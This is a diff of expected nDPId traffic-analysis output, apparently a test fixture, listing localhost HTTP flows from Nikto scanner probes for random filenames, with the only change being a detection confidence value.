+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 